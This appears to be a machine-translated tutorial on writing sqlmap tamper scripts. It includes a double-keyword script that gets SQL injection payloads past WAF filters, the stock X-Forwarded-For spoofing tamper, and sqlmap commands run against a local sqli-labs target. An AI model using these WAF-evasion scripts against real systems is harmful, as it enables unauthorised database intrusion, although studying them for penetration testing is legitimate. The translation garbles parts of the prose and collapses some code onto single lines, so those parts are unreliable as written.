Brief tamper
sqlmap the --tamper
parameter script may be introduced to modify user-defined payload during injection, whereby the bypass can be used to tamper WAF, filtered keyword is replaced and the like. This is a basic structure of tamper.
In other keywords, etc. filtered. This is a basic structure of tamper
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW # 当前脚本调用优先等级 def dependencies(): # 声明当前脚本适用/不适用的范围,可以为空。 pass def tamper(payload, **kwargs): # 用于篡改Payload、以及请求头的主要函数 return payload
my.py
into the
sqlmaptamper
path, and then use the time to add parameters
--tamper=my
on the line simple analysis
Simple Analysis
Take a tamper official have to analyze the structure
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import random
from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def randomIP(): numbers = [] while not numbers or numbers[0] in (10, 172, 192): numbers = random.sample(xrange(1, 255), 4) return '.'.join(str(_) for _ in numbers) def tamper(payload, **kwargs): """ Append a fake HTTP header 'X-Forwarded-For' """ headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() return payload
__priority__
function attribute, the function Dependencies, Tamper functions and user-defined
import
In this section we can sqlmap into the interior of the library, to us a lot sqlmap packaged functions and data types, such as the following PRIORITY
on fromsqlmap/lib/core/enums.py
PRIORITY
PRIORITY is a priority defined tamper, PRIORITY has the following parameters:
- LOWEST = -100
- the LOWER = -50
- the LOW = -10
- 0 = the NORMAL
- HIGH = 10
- 50 = IN AREAS OF COMMUNICAITIONS
- HIGHEST = 100
if the user uses more tamper, sqlmap priority will be to use a higher level of tamper according to the parameters defined level of each tamper pRIORITY, if you need to have two tamper with, you need to pay attention to this issue.
dependencies
dependencies mainly to prompt the user, which the tamper database support, the specific code as follows:
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.NORMAL
def dependencies():
singleTimeWarnMessage("这是我的tamper提示")
def tamper(payload, **kwargs):
return payload
DBMS.MYSQL This parameter represents Mysql, parameters other databases can also look at thissqlmaplibcoreenums.py
Tamper
tamper function is the most important function of tamper, you have to realize the function, where everything is written in this function. This parameter is the original payload inject payload sqlmap, we have to realize bypass, is the general modifications to the payload of. kwargs against modify http header, if you bypass, is by modifying the http header, we need to use this
Based payload
First-come, based on the modified payload to bypass keyword substitution, I use the first hurdle sqlilab, and modify some of the malicious code to replace keyword empty to avoid joint inquiry, as
Write tamper write to double bypass
def tamper(payload, **kwargs):
payload = payload.lower()
payload = payload.replace('select','seleselectct')
payload = payload.replace('union','ununionion')
return payload
Before not using tamper, we add --tech=U
to make sqlmap only tested the joint inquiry injection, --flush-session
meaning that each time you refresh the session, clearing the last of the cache.
sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --dbms=mysql
Seen from the flow burp in the payload is no double wrote, is bound to inject failure. But after using tamper
sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --tamper=my --dbms=mysql
double the normal payload, can be injected
Http-based head
We use the sqlmaptamperxforwardedfor.py
tamper to explain
def tamper(payload, **kwargs):
"""
Append a fake HTTP header 'X-Forwarded-For'
"""
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()
return payload
From kwargs
extraction of headers
the array, and then modify the value reaches xff random IP effect, not repeated.
to sum up
This paper briefly describes the preparation of tamper and double written as a demonstration example, in the actual penetration test, we need to write different for different tamper waf be used flexibly.